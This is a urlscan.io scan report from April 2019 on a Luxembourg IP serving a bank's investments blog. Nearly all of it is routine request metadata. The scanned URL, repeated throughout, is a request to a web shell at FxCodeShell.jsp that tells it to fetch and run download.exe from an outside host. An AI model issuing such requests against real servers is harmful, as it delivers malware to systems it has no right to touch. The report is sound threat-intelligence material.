193.178.219.134 Open in urlscan Pro
193.178.219.134 Public Scan

Go To Rescan
Add Verdict Report

Submitted URL:
http://193.178.219.134/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Effective URL:
https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoo...
Submission: On April 07 via manual (April 7th 2019, 3:51:03 pm UTC) from LU

Summary HTTP 45 Redirects Links 7 Behaviour Indicators

Summary

This website contacted 7 IPs in 2 countries across 5 domains to perform 45 HTTP transactions. The main IP is 193.178.219.134, located in Luxembourg, Luxembourg and belongs to , BE. The main domain is 193.178.219.134.
TLS certificate: Issued by Thawte TLS RSA CA G1 on October 17th 2018. Valid for: a year.

This is the only time 193.178.219.134 was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

	IP Address	AS Autonomous System
2 35	193.178.219.134 193.178.219.134	20501 () ()
2	2a00:1450:400... 2a00:1450:4001:81e::200e	15169 (GOOGLE) (GOOGLE - Google LLC)
2	193.178.219.143 193.178.219.143	20501 () ()
2 6	2a00:1450:400... 2a00:1450:4001:817::2004	15169 (GOOGLE) (GOOGLE - Google LLC)
2	2a00:1450:400... 2a00:1450:4001:809::200e	15169 (GOOGLE) (GOOGLE - Google LLC)
1 1	2a00:1450:400... 2a00:1450:400c:c0c::9b	15169 (GOOGLE) (GOOGLE - Google LLC)
1	2a00:1450:400... 2a00:1450:4001:815::2003	15169 (GOOGLE) (GOOGLE - Google LLC)
1	2a00:1450:400... 2a00:1450:4001:81a::200e	15169 (GOOGLE) (GOOGLE - Google LLC)
45	7

35 193.178.219.134 (Luxembourg, Luxembourg) 2 redirects

ASN20501 (, BE)

193.178.219.134	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 2a00:1450:4001:81e::200e (Ireland)

ASN15169 (GOOGLE - Google LLC, US)

www.google-analytics.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 193.178.219.143 (Luxembourg, Luxembourg)

ASN20501 (, BE)

stats.banquedeluxembourg.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

6 2a00:1450:4001:817::2004 (Ireland) 2 redirects

ASN15169 (GOOGLE - Google LLC, US)

www.google.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 2a00:1450:4001:809::200e (Ireland)

ASN15169 (GOOGLE - Google LLC, US)

cse.google.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2a00:1450:400c:c0c::9b (Ireland) 1 redirects

ASN15169 (GOOGLE - Google LLC, US)

stats.g.doubleclick.net	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2a00:1450:4001:815::2003 (Ireland)

ASN15169 (GOOGLE - Google LLC, US)

www.google.de	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2a00:1450:4001:81a::200e (Ireland)

ASN15169 (GOOGLE - Google LLC, US)

clients1.google.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

	Apex Domain Subdomains	Transfer
9	google.com 2 redirects www.google.com cse.google.com clients1.google.com	155 KB
2	banquedeluxembourg.com stats.banquedeluxembourg.com	59 KB
2	google-analytics.com www.google-analytics.com	17 KB
1	google.de www.google.de	376 B
1	doubleclick.net 1 redirects stats.g.doubleclick.net	159 B
45	5

	Domain	Requested by
6	www.google.com	2 redirects cse.google.com 193.178.219.134
2	cse.google.com	193.178.219.134 www.google.com
2	stats.banquedeluxembourg.com	193.178.219.134
2	www.google-analytics.com	193.178.219.134
1	clients1.google.com	193.178.219.134
1	www.google.de	193.178.219.134
1	stats.g.doubleclick.net	1 redirects
45	7

This site contains links to these domains. Also see Links.

Domain
www.banquedeluxembourg.com
www.banquedeluxembourgnews.com
www.linkedin.com
plus.google.com
www.twitter.com
vimeopro.com

Subject Issuer	Validity	Valid
www.blinvestmentsblog.com Thawte TLS RSA CA G1	`2018-10-17` - `2019-10-28`	a year	crt.sh
*.google-analytics.com Google Internet Authority G3	`2019-03-01` - `2019-05-24`	3 months	crt.sh
stats.banquedeluxembourg.com Thawte TLS RSA CA G1	`2018-06-27` - `2019-07-08`	a year	crt.sh
*.google.com Google Internet Authority G3	`2019-03-01` - `2019-05-24`	3 months	crt.sh
www.google.de Google Internet Authority G3	`2019-03-01` - `2019-05-24`	3 months	crt.sh
www.google.com Google Internet Authority G3	`2019-03-01` - `2019-05-24`	3 months	crt.sh

This page contains 1 frames:

Primary Page: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Frame ID: 48F64BA4A213F12759EA2BA4BE39BF51
Requests: 45 HTTP requests in this frame

Screenshot
Live screenshot

Full Image

Page URL History Show full URLs

http://193.178.219.134/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/d... HTTP 302
https://193.178.219.134/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/d... HTTP 302
https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&addre... Page URL

Detected technologies

Liferay (CMS) Expand

Overall confidence: 100%
Detected patterns

env /^Liferay$/i

Java (Programming Languages) Expand

Overall confidence: 100%
Detected patterns

headers server /Apache-Coyote(\/1\.1)?/i

AlloyUI (JavaScript Frameworks) Expand

Overall confidence: 100%
Detected patterns

env /^AUI$/i

Apache Tomcat (Web Servers) Expand

Overall confidence: 100%
Detected patterns

headers server /Apache-Coyote(\/1\.1)?/i

Clipboard.js (Miscellaneous) Expand

Overall confidence: 100%
Detected patterns

script /clipboard(?:\.min)?\.js/i
env /^Clipboard$/i

Font Awesome (Font Scripts) Expand

Overall confidence: 100%
Detected patterns

html /<link[^>]* href=[^>]+font-awesome(?:\.min)?\.css/i

Google Analytics (Analytics) Expand

Overall confidence: 100%
Detected patterns

script /google-analytics\.com\/(?:ga|urchin|(analytics))\.js/i
env /^gaGlobal$/i

jQuery (JavaScript Libraries) Expand

Overall confidence: 100%
Detected patterns

script /jquery(?:\-|\.)([\d.]*\d)[^\/]*\.js/i
script /jquery.*\.js/i
env /^jQuery$/i
script /jquery-ui(?:-|\.)([\d.]*\d)[^\/]*\.js/i
script /jquery-ui.*\.js/i

jQuery UI (JavaScript Libraries) Expand

Overall confidence: 100%
Detected patterns

script /jquery-ui(?:-|\.)([\d.]*\d)[^\/]*\.js/i
script /jquery-ui.*\.js/i

YUI (JavaScript Libraries) Expand

Overall confidence: 100%
Detected patterns

env /^AUI$/i

Piwik () Expand

Overall confidence: 100%
Detected patterns

script /piwik\.js|piwik\.php/i
env /^Piwik$/i
env /^_paq$/i

Twitter Bootstrap () Expand

Overall confidence: 100%
Detected patterns

env /^AUI$/i

Page Statistics

45
Requests

27 %
HTTPS

75 %
IPv6

5
Domains

7
Subdomains

7
IPs

2
Countries

733 kB
Transfer

2040 kB
Size

9
Cookies

7 Outgoing links

These are links going to different origins than the main page.

URL: https://www.banquedeluxembourg.com/en/bank/corporate/bli_banque-de-luxembourg-investments
Title: www.bli.lu

Search URL Search Domain Scan URL

URL: https://www.banquedeluxembourgnews.com/en/bank/blnews/homepage
Title: Banque de Luxembourg News

Search URL Search Domain Scan URL

URL: https://www.linkedin.com/company/banque-de-luxembourg-investments
Title:

Search URL Search Domain Scan URL

URL: https://plus.google.com/115042341269060981517?rel=publisher
Title:

Search URL Search Domain Scan URL

URL: https://www.twitter.com/BLInvestmentsEN
Title:

Search URL Search Domain Scan URL

URL: https://vimeopro.com/banquedeluxembourg/bli
Title:

Search URL Search Domain Scan URL

URL: https://www.banquedeluxembourg.com/BLPortlets-portlet/bankServlet/GedGetFileServiceSvt/pdf/Data%20privacy%20notice%20-%20EN%20-%2006.09.2018.pdf?docname=Data+privacy+notice&lang=FR&typeRequest=getFileFast&documentId=46604351FA97AF02AE446037676B406152A0668FF28E7173CAD96B78F4A3326D&wmDocName=
Title: Protection of personal data

Search URL Search Domain Scan URL

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

http://193.178.219.134/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe HTTP 302
https://193.178.219.134/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe HTTP 302
https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

Request Chain 24

https://www.google.com/cse/cse.js?cx=008097758809389850888%3Aud1vruy6hee HTTP 302
https://cse.google.com/cse/cse.js?cx=008097758809389850888%3Aud1vruy6hee

Request Chain 27

https://stats.g.doubleclick.net/r/collect?t=dc&aip=1&_r=3&v=1&_v=j73&tid=UA-3332547-2&cid=951552957.1554652248&jid=547237299&gjid=369708804&_gid=1199922075.1554652248&_u=IGBAgEAB~&z=463232346 HTTP 302
https://www.google.com/ads/ga-audiences?v=1&aip=1&t=sr&_r=4&tid=UA-3332547-2&cid=951552957.1554652248&jid=547237299&_v=j73&z=463232346 HTTP 302
https://www.google.de/ads/ga-audiences?v=1&aip=1&t=sr&_r=4&tid=UA-3332547-2&cid=951552957.1554652248&jid=547237299&_v=j73&z=463232346&slf_rd=1&random=1485780458

45 HTTP transactions
0 data transactions

Method
Protocol Status Resource
Path Size
x-fer Time
Latency Type
MIME-Type IP
Location

GET
H/1.1

404
Not Found

Primary Request

Cookie set FxCodeShell.jsp Show response
193.178.219.134/en/bank/blinvestmentsblog/
Redirect Chain

http://193.178.219.134/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
https://193.178.219.134/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

21 KB
6 KB

229ms
228ms

Document
text/html

193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

7f05331651d95c9439ac3d53d9fe98231684b3f692233a84f5c53d19cb56779d

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Host: 193.178.219.134
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Date: Sun, 07 Apr 2019 15:50:43 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-XSS-Protection: 1
Content-Encoding: gzip
Liferay-Portal: Liferay Portal Community Edition 6.2 CE GA6 (Newton / Build 6205 / January 6, 2016)
Content-Type: text/html;charset=UTF-8
Set-Cookie: GUEST_LANGUAGE_ID=en_US; Expires=Thu, 19-Nov-2065 18:32:51 GMT; Path=/; Secure; HttpOnly COOKIE_SUPPORT=true; Expires=Thu, 19-Nov-2065 18:32:51 GMT; Path=/; Secure; HttpOnly
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked

Redirect headers

Date: Sun, 07 Apr 2019 15:50:43 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-XSS-Protection: 1
Location: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Content-Length: 0
Set-Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; Path=/; Secure; HttpOnly
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

GET
H/1.1 200
OK Cookie set jquery.fancybox.min.css
193.178.219.134/bl-blog-theme/js/fancybox/ 5 KB
2 KB 122ms
95ms Stylesheet
text/css 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/js/fancybox/jquery.fancybox.min.css

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

90ffa2a4f71361aadba6262f2de9437c5d77c5057072aa6d1f0df4bfe4869dfa

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/css,*/*;q=0.1
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 1264
X-XSS-Protection: 1
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "ab7594ad"
Vary: Accept-Encoding
Content-Type: text/css
Cache-Control: max-age=315360000, public
Set-Cookie: JSESSIONID=ED2256E888AF79DAE3ABE239EF8B4DDE; Path=/bl-blog-theme/; Secure; HttpOnly
Keep-Alive: timeout=15, max=98

GET
H/1.1 200
OK Cookie set font-awesome.css
193.178.219.134/bl-blog-theme/css/ 32 KB
7 KB 138ms
93ms Stylesheet
text/css 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/css/font-awesome.css

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

2e0e4c2f987047705b227d076c5bb50381e016f3b85e1bfaddd672a756e61528

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/css,*/*;q=0.1
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 6264
X-XSS-Protection: 1
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "85fd1772"
Vary: Accept-Encoding
Content-Type: text/css
Cache-Control: max-age=315360000, public
Set-Cookie: JSESSIONID=D5B56D2CFEA8314D125295CCE59807F2; Path=/bl-blog-theme/; Secure; HttpOnly
Keep-Alive: timeout=15, max=100

GET
H/1.1 200
OK Cookie set jquery-1.11.3.min.js Show response
193.178.219.134/bl-blog-theme/js/ 94 KB
33 KB 198ms
54ms Script
application/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/js/jquery-1.11.3.min.js

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

20e11ce61890c08c0529911822233c9023ebc367df6c1050dec105e2b9628104

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 33329
X-XSS-Protection: 1
Last-Modified: Tue, 14 Feb 2017 15:18:06 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "5297851a"
Vary: Accept-Encoding
Content-Type: application/javascript
Cache-Control: max-age=315360000, public
Set-Cookie: JSESSIONID=7D71827FC6802224EC4C51190D3DAB3F; Path=/bl-blog-theme/; Secure; HttpOnly
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=99

GET
H/1.1 200
OK Cookie set jquery-ui-1.10.4.custom.min.js Show response
193.178.219.134/bl-blog-theme/js/ 29 KB
10 KB 194ms
43ms Script
application/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/js/jquery-ui-1.10.4.custom.min.js

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

f03d1a004812ab36712ae519333d4751b14a69b34095defe062d6fed55d621fc

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 9775
X-XSS-Protection: 1
Last-Modified: Tue, 14 Feb 2017 15:18:06 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "adc3472a"
Vary: Accept-Encoding
Content-Type: application/javascript
Cache-Control: max-age=315360000, public
Set-Cookie: JSESSIONID=70EF07039BC980235E274AE69922C08F; Path=/bl-blog-theme/; Secure; HttpOnly
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=99

GET
H/1.1 200
OK Cookie set jquery.easing.min.js Show response
193.178.219.134/bl-blog-theme/js/ 5 KB
3 KB 233ms
71ms Script
application/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/js/jquery.easing.min.js

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

e2bb83771b8fb190d17ca13302493e2c66d42a9fcba8002a7ab93510fac8134c

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 1868
X-XSS-Protection: 1
Last-Modified: Tue, 14 Feb 2017 15:18:06 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "c3edd1de"
Vary: Accept-Encoding
Content-Type: application/javascript
Cache-Control: max-age=315360000, public
Set-Cookie: JSESSIONID=49673D6D07C698C519E0902A06FBC5F6; Path=/bl-blog-theme/; Secure; HttpOnly
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=99

GET
H/1.1 200
OK Cookie set clipboard.min.js Show response
193.178.219.134/bl-blog-theme/js/copyToClipboard/ 4 KB
2 KB 250ms
31ms Script
application/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/js/copyToClipboard/clipboard.min.js

Requested by

Host: 193.178.219.134
URL: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe

Protocol

HTTP/1.1

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

193.178.219.134 Luxembourg, Luxembourg, ASN20501 (, BE),

Reverse DNS

Software

Apache-Coyote/1.1 /

Resource Hash

74e2d7534480b694da038fdad50cb5d4db1626836f12d450da4a929c1cd3787b

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN SAMEORIGIN
X-Xss-Protection	1

Request headers

Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Host: 193.178.219.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
Cookie: JSESSIONID_BLOGS_PRD=C468C0F781EF9B0B86ECDA13E8849B69; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Connection: keep-alive
Cache-Control: no-cache
Referer: https://193.178.219.134/en/bank/blinvestmentsblog/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Response headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Encoding: gzip
X-Content-Type-Options: nosniff
filter-class: com.liferay.portal.servlet.filters.header.HeaderFilter
Date: Sun, 07 Apr 2019 15:50:43 GMT
Connection: Keep-Alive
Content-Length: 1516
X-XSS-Protection: 1
Last-Modified: Tue, 14 Feb 2017 15:18:06 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN SAMEORIGIN
ETag: "988b8aa4"
Vary: Accept-Encoding
Content-Type: application/javascript
Cache-Control: max-age=315360000, public
Set-Cookie: JSESSIONID=E9791A51AB48BF5EF773BC57A8C0A602; Path=/bl-blog-theme/; Secure; HttpOnly
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=99

GET
H/1.1 200
OK Cookie set jquery.fancybox.min.js Show response
193.178.219.134/bl-blog-theme/js/fancybox/ 22 KB
9 KB 277ms
47ms Script
application/javascript 193.178.219.134

General

Check archive.org

Show headers Download Go to

Full URL

https://193.178.219.134/bl-blog-theme/js/fancybox/jquery.fancybox.min.js

Requested by

Host: 193.178.219.134
